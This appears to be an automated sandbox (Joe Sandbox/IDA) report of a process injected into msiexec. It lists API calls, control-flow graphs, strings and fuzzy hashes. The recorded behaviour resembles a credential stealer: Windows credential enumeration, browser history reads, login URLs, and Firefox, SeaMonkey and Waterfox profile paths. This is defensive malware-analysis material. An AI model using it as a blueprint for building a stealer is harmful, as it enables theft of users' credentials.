
                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                              • Part of subcall function 0040DD85: memset.MSVCRT ref: 0040DDAD
                                                                                              • Part of subcall function 0040DD85: CreateFileW.KERNELBASE(?,80000000,00000003,00000000,00000003,00000000,00000000,?,000000FF,00000000,00000104), ref: 0040DDD4
                                                                                              • Part of subcall function 0040DD85: NtQuerySystemInformation.NTDLL(00000010,00000104,00001000,00000000,?,000000FF,00000000,00000104), ref: 0040DE15
                                                                                              • Part of subcall function 0040DD85: CloseHandle.KERNELBASE(C0000004,?,000000FF,00000000,00000104), ref: 0040DE3E
                                                                                              • Part of subcall function 0040DD85: GetCurrentProcessId.KERNEL32(?,000000FF,00000000,00000104), ref: 0040DE49
                                                                                              • Part of subcall function 0040DD85: _wcsicmp.MSVCRT ref: 0040DEB2
                                                                                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                            • OpenProcess.KERNEL32(00000040,00000000,00000000,00000104,?,00000000,00000104,?,00000000,00000104,00000000), ref: 0040E093
                                                                                            • GetCurrentProcess.KERNEL32(?,80000000,00000000,00000000), ref: 0040E0B2
                                                                                            • DuplicateHandle.KERNELBASE(?,00000104,00000000), ref: 0040E0BF
                                                                                            • GetFileSize.KERNEL32(?,00000000), ref: 0040E0D4
                                                                                              • Part of subcall function 00409A45: GetTempPathW.KERNEL32(00000104,?,00445FAE), ref: 00409A5C
                                                                                              • Part of subcall function 00409A45: GetWindowsDirectoryW.KERNEL32(?,00000104), ref: 00409A6E
                                                                                              • Part of subcall function 00409A45: GetTempFileNameW.KERNELBASE(?,0040B827,00000000,?), ref: 00409A85
                                                                                              • Part of subcall function 004096DC: CreateFileW.KERNELBASE(00000001,40000000,00000001,00000000,00000002,00000000,00000000,0040E0F1,00000104), ref: 004096EE
                                                                                            • CreateFileMappingW.KERNELBASE(?,00000000,00000002,00000000,00000000,00000000), ref: 0040E0FE
                                                                                            • MapViewOfFile.KERNELBASE(00000000,00000004,00000000,00000000,00000104), ref: 0040E113
                                                                                            • WriteFile.KERNELBASE(00000000,00000000,00000104,0040E6A3,00000000), ref: 0040E12E
                                                                                            • UnmapViewOfFile.KERNEL32(00000000), ref: 0040E135
                                                                                            • CloseHandle.KERNELBASE(?), ref: 0040E13E
                                                                                            • CloseHandle.KERNEL32(00000000), ref: 0040E143
                                                                                            • CloseHandle.KERNEL32(?), ref: 0040E148
                                                                                            • CloseHandle.KERNEL32(?), ref: 0040E14D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: File$Handle$Close$CreateProcess$CurrentTempView$??2@DirectoryDuplicateInformationMappingNameOpenPathQuerySizeSystemUnmapWindowsWrite_wcsicmpmemset
                                                                                            • String ID: bhv
                                                                                            • API String ID: 4234240956-2689659898
                                                                                            • Opcode ID: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                            • Instruction ID: 69536691d8562172d0558c987aea6dfe4ed17d6a9a6de0cf2c6621a9a97a0e87
                                                                                            • Opcode Fuzzy Hash: c96677cf1f2b88af9f6f98c954d74ea01aac065ab95576d822b7ccb478d5ef78
                                                                                            • Instruction Fuzzy Hash: 15412775800218FBCF119FA6CC489DFBFB9FF09750F148466F504A6250D7748A50CBA8

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 634 413f4f-413f52 635 413fa5 634->635 636 413f54-413f5a call 40a804 634->636 638 413f5f-413fa4 GetProcAddress * 5 636->638 638->635
                                                                                            APIs
                                                                                              • Part of subcall function 0040A804: memset.MSVCRT ref: 0040A824
                                                                                              • Part of subcall function 0040A804: GetSystemDirectoryW.KERNEL32(0045DE68,00000104), ref: 0040A841
                                                                                              • Part of subcall function 0040A804: wcscpy.MSVCRT ref: 0040A854
                                                                                              • Part of subcall function 0040A804: wcscat.MSVCRT ref: 0040A86A
                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNELBASE(00000000,?,?,?,?,?,?,?), ref: 0040A87B
                                                                                              • Part of subcall function 0040A804: LoadLibraryW.KERNEL32(?,?,?,?,?,?,?,?), ref: 0040A884
                                                                                            • GetProcAddress.KERNEL32(00000000,psapi.dll), ref: 00413F6F
                                                                                            • GetProcAddress.KERNEL32(?,EnumProcessModules), ref: 00413F7B
                                                                                            • GetProcAddress.KERNEL32(?,GetModuleFileNameExW), ref: 00413F87
                                                                                            • GetProcAddress.KERNEL32(?,EnumProcesses), ref: 00413F93
                                                                                            • GetProcAddress.KERNEL32(?,GetModuleInformation), ref: 00413F9F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$LibraryLoad$DirectorySystemmemsetwcscatwcscpy
                                                                                            • String ID: EnumProcessModules$EnumProcesses$GetModuleBaseNameW$GetModuleFileNameExW$GetModuleInformation$psapi.dll
                                                                                            • API String ID: 2941347001-70141382
                                                                                            • Opcode ID: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                                            • Instruction ID: 7b3d606b7d389a8205b465373562f67d85acf78e859b2fe1c5436fc88fb80995
                                                                                            • Opcode Fuzzy Hash: 39c22376907c33733211e363db3c4349312dc982ad78c4cc463d34b505bb12c7
                                                                                            • Instruction Fuzzy Hash: BBF03470840340AECB706F769809E06BEF0EFD8B097318C2EE6C557291E3BD9098DE48

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 639 4466f4-44670e call 446904 GetModuleHandleA 642 446710-44671b 639->642 643 44672f-446732 639->643 642->643 644 44671d-446726 642->644 645 44675b-4467aa __set_app_type __p__fmode __p__commode call 4153f2 643->645 647 446747-44674b 644->647 648 446728-44672d 644->648 652 4467ac-4467b7 __setusermatherr 645->652 653 4467b8-44680e call 4468f0 _initterm __wgetmainargs _initterm 645->653 647->643 651 44674d-44674f 647->651 648->643 650 446734-44673b 648->650 650->643 654 44673d-446745 650->654 655 446755-446758 651->655 652->653 658 446810-446819 653->658 659 44681e-446825 653->659 654->655 655->645 660 4468d8-4468dd call 44693d 658->660 661 446827-446832 659->661 662 44686c-446870 659->662 665 446834-446838 661->665 666 44683a-44683e 661->666 663 446845-44684b 662->663 664 446872-446877 662->664 670 446853-446864 GetStartupInfoW 663->670 671 44684d-446851 663->671 664->662 665->661 665->666 666->663 668 446840-446842 666->668 668->663 672 446866-44686a 670->672 673 446879-44687b 670->673 671->668 671->670 674 44687c-446894 GetModuleHandleA call 41276d 672->674 673->674 677 446896-446897 exit 674->677 678 44689d-4468d6 _cexit 674->678 677->678 678->660
                                                                                            APIs
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: HandleModule_initterm$InfoStartup__p__commode__p__fmode__set_app_type__setusermatherr__wgetmainargs_cexitexit
                                                                                            • String ID:
                                                                                            • API String ID: 2827331108-0
                                                                                            • Opcode ID: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                                            • Instruction ID: 0e3254bf032efe29fc581ce6ca9889a5a3d5d0d8e47fd2ea34fa35870f4f4cb9
                                                                                            • Opcode Fuzzy Hash: 7ba7b2652c13871cd0d5cae79e0f4a701fe2602556b2c3d333f15f3a91922bbb
                                                                                            • Instruction Fuzzy Hash: 9D51C474C41314DFEB21AF65D8499AD7BB0FB0A715F21452BE82197291D7788C82CF1E

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 0040C298
                                                                                              • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E60F
                                                                                              • Part of subcall function 0040E5ED: memset.MSVCRT ref: 0040E629
                                                                                              • Part of subcall function 0040AFCF: ??2@YAPAXI@Z.MSVCRT(00000001,00000001,00401E7F), ref: 0040AFD8
                                                                                            • FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                            • wcschr.MSVCRT ref: 0040C324
                                                                                            • wcschr.MSVCRT ref: 0040C344
                                                                                            • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                            • GetLastError.KERNEL32 ref: 0040C373
                                                                                            • FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C39F
                                                                                            • FindCloseUrlCache.WININET(?), ref: 0040C3B0
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: CacheFind$Entrymemset$Nextwcschr$??2@CloseErrorFirstLast
                                                                                            • String ID: visited:
                                                                                            • API String ID: 1157525455-1702587658
                                                                                            • Opcode ID: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                            • Instruction ID: 6629d855392f08d41decd2a192e4b6579142cf3eaa95f33c860a05aa0b18639b
                                                                                            • Opcode Fuzzy Hash: e6e827466474dba504c602eadc9ccabadb05f86476a5423d269347cfbfdac146
                                                                                            • Instruction Fuzzy Hash: DA417F71D00219ABDB10EF92DC85AEFBBB8FF45714F10416AE904F7281D7389A45CBA9

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 705 40e175-40e1a1 call 40695d call 406b90 710 40e1a7-40e1e5 memset 705->710 711 40e299-40e2a8 call 4069a3 705->711 713 40e1e8-40e1fa call 406e8f 710->713 717 40e270-40e27d call 406b53 713->717 718 40e1fc-40e219 call 40dd50 * 2 713->718 717->713 724 40e283-40e286 717->724 718->717 729 40e21b-40e21d 718->729 725 40e291-40e294 call 40aa04 724->725 726 40e288-40e290 free 724->726 725->711 726->725 729->717 730 40e21f-40e235 call 40742e 729->730 730->717 733 40e237-40e242 call 40aae3 730->733 733->717 736 40e244-40e26b _snwprintf call 40a8d0 733->736 736->717
                                                                                            APIs
                                                                                              • Part of subcall function 00406B90: _wcsicmp.MSVCRT ref: 00406BC1
                                                                                            • memset.MSVCRT ref: 0040E1BD
                                                                                              • Part of subcall function 00406E8F: memset.MSVCRT ref: 00406F8B
                                                                                            • free.MSVCRT ref: 0040E28B
                                                                                              • Part of subcall function 0040DD50: _wcsicmp.MSVCRT ref: 0040DD69
                                                                                              • Part of subcall function 0040AAE3: wcslen.MSVCRT ref: 0040AAF2
                                                                                              • Part of subcall function 0040AAE3: _memicmp.MSVCRT ref: 0040AB20
                                                                                            • _snwprintf.MSVCRT ref: 0040E257
                                                                                              • Part of subcall function 0040A8D0: wcslen.MSVCRT ref: 0040A8E2
                                                                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A908
                                                                                              • Part of subcall function 0040A8D0: free.MSVCRT ref: 0040A92B
                                                                                              • Part of subcall function 0040A8D0: memcpy.MSVCRT(?,?,000000FF,00000000,?,?,00000000,?,0040320A,00000000,000000FF), ref: 0040A94F
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: free$_wcsicmpmemsetwcslen$_memicmp_snwprintfmemcpy
                                                                                            • String ID: $ContainerId$Container_%I64d$Containers$Name
                                                                                            • API String ID: 2804212203-2982631422
                                                                                            • Opcode ID: 3292a8bc8b2a8f6d115ff62c82a82f0362dff8113198451487ff657a70090be0
                                                                                            • Instruction ID: de93d03617a61f3aa6bbe184beafcfad76b4f566d35596b706efacabd7485ccb
                                                                                            • Opcode Fuzzy Hash: 3292a8bc8b2a8f6d115ff62c82a82f0362dff8113198451487ff657a70090be0
                                                                                            • Instruction Fuzzy Hash: 74318272D002196ADF10EFA6DC45ADEB7B8AF04344F1105BFE508B3191DB38AE598F99

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                              • Part of subcall function 0040CC26: GetFileSize.KERNEL32(00000000,00000000,000003FF,?,00000000,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE,?), ref: 0040CC44
                                                                                              • Part of subcall function 0040CC26: CloseHandle.KERNELBASE(?,?,000000FF,0000FDE9), ref: 0040CC98
                                                                                              • Part of subcall function 0040CCF0: _wcsicmp.MSVCRT ref: 0040CD2A
                                                                                            • memset.MSVCRT ref: 0040BC75
                                                                                            • memset.MSVCRT ref: 0040BC8C
                                                                                            • WideCharToMultiByte.KERNEL32(00000000,00000000,0044E518,000000FF,?,00000FFF,00000000,00000000,?,?,?,0040B7D4,?,?), ref: 0040BCA8
                                                                                            • memcmp.MSVCRT(?,00000000,00000005,?,?,?,0040B7D4,?,?,?,?,000003FF,?,?,?,00445FAE), ref: 0040BCD6
                                                                                            • memcpy.MSVCRT(00000024,?,00000020,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD2B
                                                                                            • LocalFree.KERNEL32(?,?,00000000,00000000,?,?,?,?,?,?,?,0040B7D4), ref: 0040BD3D
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$ByteCharCloseFileFreeHandleLocalMultiSizeWide_wcsicmpmemcmpmemcpy
                                                                                            • String ID:
                                                                                            • API String ID: 115830560-3916222277
                                                                                            • Opcode ID: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                            • Instruction ID: 00a8249a540342db609c93f8c1f67c79963b4134db5221072d0e6ece1bb2d715
                                                                                            • Opcode Fuzzy Hash: 2c6b40c8534ef55c53201c5afea9c0c191c5eda6ef18d79290db5ec64fa84378
                                                                                            • Instruction Fuzzy Hash: 3F41B372900219ABDB10ABA5CC85ADEB7ACEF04314F01057BB509F7292D7789E45CA99

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                              • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1AE
                                                                                              • Part of subcall function 0040B1AB: free.MSVCRT ref: 0040B1B6
                                                                                              • Part of subcall function 0040AA04: free.MSVCRT ref: 0040AA0B
                                                                                              • Part of subcall function 0040C274: memset.MSVCRT ref: 0040C298
                                                                                              • Part of subcall function 0040C274: FindFirstUrlCacheEntryW.WININET(visited:,?,80000001), ref: 0040C30D
                                                                                              • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C324
                                                                                              • Part of subcall function 0040C274: wcschr.MSVCRT ref: 0040C344
                                                                                              • Part of subcall function 0040C274: FindNextUrlCacheEntryW.WININET(?,?,80000001), ref: 0040C369
                                                                                              • Part of subcall function 0040C274: GetLastError.KERNEL32 ref: 0040C373
                                                                                              • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C439
                                                                                              • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,?,?,00000000,?), ref: 0040C467
                                                                                              • Part of subcall function 0040C3C3: _wcsupr.MSVCRT ref: 0040C481
                                                                                              • Part of subcall function 0040C3C3: memset.MSVCRT ref: 0040C4D0
                                                                                              • Part of subcall function 0040C3C3: RegEnumValueW.ADVAPI32(?,00000000,?,000000FF,00000000,?,00000000,?,?,?,000000FF,?,?,?,?,00000000), ref: 0040C4FB
                                                                                            • _wcslwr.MSVCRT ref: 0040C817
                                                                                              • Part of subcall function 0040C634: wcslen.MSVCRT ref: 0040C65F
                                                                                              • Part of subcall function 0040C634: memset.MSVCRT ref: 0040C6BF
                                                                                            • wcslen.MSVCRT ref: 0040C82C
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$free$CacheEntryEnumFindValuewcschrwcslen$ErrorFirstLastNext_wcslwr_wcsupr
                                                                                            • String ID: /$/$http://www.facebook.com/$https://login.yahoo.com/config/login$https://www.google.com/accounts/servicelogin
                                                                                            • API String ID: 2936932814-4196376884
                                                                                            • Opcode ID: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                            • Instruction ID: 5b72bd72183a146cc5fb8da473a5bce975bbff0c760a192580a28ed18ba85502
                                                                                            • Opcode Fuzzy Hash: 2e55d37c3c93c49036042ab263f5962c07f69a8f438a79de627d7f97dd271f33
                                                                                            • Instruction Fuzzy Hash: 42218272A00244A6CF10BB6A9C8589E7B68EF44744B10457BB804B7293D67CDE85DB9D

                                                                                            Control-flow Graph

                                                                                            • Executed
                                                                                            • Not Executed
                                                                                            control_flow_graph 828 40bdb0-40bdce call 404363 831 40bf63-40bf6f call 40440c 828->831 832 40bdd4-40bddd 828->832 834 40bdee 832->834 835 40bddf-40bdec CredEnumerateW 832->835 836 40bdf0-40bdf2 834->836 835->836 836->831 838 40bdf8-40be18 call 40b2cc wcslen 836->838 841 40bf5d 838->841 842 40be1e-40be20 838->842 841->831 842->841 843 40be26-40be42 wcsncmp 842->843 844 40be48-40be77 call 40bd5d call 404423 843->844 845 40bf4e-40bf57 843->845 844->845 850 40be7d-40bea3 memset 844->850 845->841 845->842 851 40bea5 850->851 852 40bea7-40beea memcpy 850->852 851->852 853 40bf11-40bf2d wcschr 852->853 854 40beec-40bf06 call 40b2cc _wcsnicmp 852->854 855 40bf38-40bf48 LocalFree 853->855 856 40bf2f-40bf35 853->856 854->853 859 40bf08-40bf0e 854->859 855->845 856->855 859->853
                                                                                            APIs
                                                                                              • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 00404398
                                                                                              • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043AC
                                                                                              • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043BF
                                                                                              • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043D3
                                                                                              • Part of subcall function 00404363: GetProcAddress.KERNEL32(?,00000000), ref: 004043E7
                                                                                            • CredEnumerateW.SECHOST(00000000,00000000,?,?,?,00000000,?), ref: 0040BDE9
                                                                                            • wcslen.MSVCRT ref: 0040BE06
                                                                                            • wcsncmp.MSVCRT ref: 0040BE38
                                                                                            • memset.MSVCRT ref: 0040BE91
                                                                                            • memcpy.MSVCRT(?,?,?,00000001,?,?,?,00000000,?), ref: 0040BEB2
                                                                                            • _wcsnicmp.MSVCRT ref: 0040BEFC
                                                                                            • wcschr.MSVCRT ref: 0040BF24
                                                                                            • LocalFree.KERNEL32(?,?,?,?,00000001,?,?,?,00000000,?), ref: 0040BF48
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: AddressProc$CredEnumerateFreeLocal_wcsnicmpmemcpymemsetwcschrwcslenwcsncmp
                                                                                            • String ID:
                                                                                            • API String ID: 697348961-0
                                                                                            • Opcode ID: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                            • Instruction ID: 79a9ca8399314c5bcb3e205da5602351372edcdcc58f79068602210d8f55f42f
                                                                                            • Opcode Fuzzy Hash: 4320d3521706fdf8c6ed48fb05be967b0956d3d4dbd01890db6896aba47bd834
                                                                                            • Instruction Fuzzy Hash: 1851E9B5D002099FCF20DFA5C8859AEBBF9FF48304F10452AE919F7251E734A9458F69

                                                                                            Control-flow Graph

                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 00403CBF
                                                                                            • memset.MSVCRT ref: 00403CD4
                                                                                            • memset.MSVCRT ref: 00403CE9
                                                                                            • memset.MSVCRT ref: 00403CFE
                                                                                            • memset.MSVCRT ref: 00403D13
                                                                                              • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                              • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                              • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                            • memset.MSVCRT ref: 00403DDA
                                                                                              • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                              • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                                                                                            • String ID: Waterfox$Waterfox\Profiles
                                                                                            • API String ID: 1829478387-11920434
                                                                                            • Opcode ID: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                            • Instruction ID: d72014143a293005b417e5222852f61d3cfc405123c5957a7e6d01a12b636873
                                                                                            • Opcode Fuzzy Hash: fa7a89f4834ef8b5b40aee994800d4865c67d250ea9d7d7a0362dcd02f226988
                                                                                            • Instruction Fuzzy Hash: 1E4133B294012C7ADB20EB56DC85ECF777CEF85314F1180ABB509B2181DA745B948FAA
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 00403E50
                                                                                            • memset.MSVCRT ref: 00403E65
                                                                                            • memset.MSVCRT ref: 00403E7A
                                                                                            • memset.MSVCRT ref: 00403E8F
                                                                                            • memset.MSVCRT ref: 00403EA4
                                                                                              • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                              • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                              • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                            • memset.MSVCRT ref: 00403F6B
                                                                                              • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                              • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                                                                                            • String ID: Mozilla\SeaMonkey$Mozilla\SeaMonkey\Profiles
                                                                                            • API String ID: 1829478387-2068335096
                                                                                            • Opcode ID: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                            • Instruction ID: badb9319ce56d3a3e0b5d4601891faab39f88fc9b3936f94b46873e2979bc7df
                                                                                            • Opcode Fuzzy Hash: 4e0f951fde323d6a6ece029bc301e1d43e2d4c472937678d86f27e99a49f71a6
                                                                                            • Instruction Fuzzy Hash: F94133B294012CBADB20EB56DC85FCF777CAF85314F1180A7B509F2181DA785B848F6A
                                                                                            APIs
                                                                                            • memset.MSVCRT ref: 00403FE1
                                                                                            • memset.MSVCRT ref: 00403FF6
                                                                                            • memset.MSVCRT ref: 0040400B
                                                                                            • memset.MSVCRT ref: 00404020
                                                                                            • memset.MSVCRT ref: 00404035
                                                                                              • Part of subcall function 00414C2E: memset.MSVCRT ref: 00414C87
                                                                                              • Part of subcall function 00414C2E: wcscpy.MSVCRT ref: 00414CFC
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D29
                                                                                              • Part of subcall function 00409D1F: wcslen.MSVCRT ref: 00409D33
                                                                                              • Part of subcall function 00409D1F: wcscpy.MSVCRT ref: 00409D47
                                                                                              • Part of subcall function 00409D1F: wcscat.MSVCRT ref: 00409D55
                                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404172
                                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041D6
                                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 004041E7
                                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404200
                                                                                              • Part of subcall function 0040414F: memset.MSVCRT ref: 00404215
                                                                                              • Part of subcall function 0040414F: _snwprintf.MSVCRT ref: 0040422F
                                                                                              • Part of subcall function 0040414F: wcscpy.MSVCRT ref: 00404242
                                                                                            • memset.MSVCRT ref: 004040FC
                                                                                              • Part of subcall function 004099C6: wcslen.MSVCRT ref: 004099CD
                                                                                              • Part of subcall function 004099C6: memcpy.MSVCRT(?,?,00000104,?,0040BAA5,00445FAE), ref: 004099E3
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memset$wcscpy$wcslen$_snwprintfmemcpywcscat
                                                                                            • String ID: Mozilla\Firefox$Mozilla\Firefox\Profiles
                                                                                            • API String ID: 1829478387-3369679110
                                                                                            • Opcode ID: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                            • Instruction ID: a33c26704871042caa7cb74448a1974e70df039046fe21947f04a6d8cbe9f93a
                                                                                            • Opcode Fuzzy Hash: e8b210b2701fced3ec1563677da70e7bdaed7d27e85ea88c95246b73557c45d8
                                                                                            • Instruction Fuzzy Hash: 354134B294012CBADB20EB56DC85ECF777CAF85314F1180A7B509B3181EA745B948F6A
                                                                                            APIs
                                                                                            • memcpy.MSVCRT(00000048,00451D40,0000002C,000003FF,00445FAE,?,00000000,?,0040B879), ref: 004444E3
                                                                                            Strings
                                                                                            Memory Dump Source
                                                                                            • Source File: 0000000A.00000002.2878265705.0000000000400000.00000040.80000000.00040000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                            Joe Sandbox IDA Plugin
                                                                                            • Snapshot File: hcaresult_10_2_400000_msiexec.jbxd
                                                                                            Similarity
                                                                                            • API ID: memcpy
                                                                                            • String ID: BINARY$NOCASE$RTRIM$main$no such vfs: %s$temp
                                                                                            • API String ID: 3510742995-2641926074
                                                                                            • Opcode ID: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                            • Instruction ID: 565814064bb2237b40e40c3ad6633df45ffc5137317807aec9a32ad89077b3bf
                                                                                            • Opcode Fuzzy Hash: 821e0fdd347fba4e0959882d1eed221cd0f9849de050a87fd0c537b7ccc40074
                                                                                            • Instruction Fuzzy Hash: BA7119B1600701BFE710AF16CC81B66B7A8BB85319F11452FF4189B742D7BDED908B99
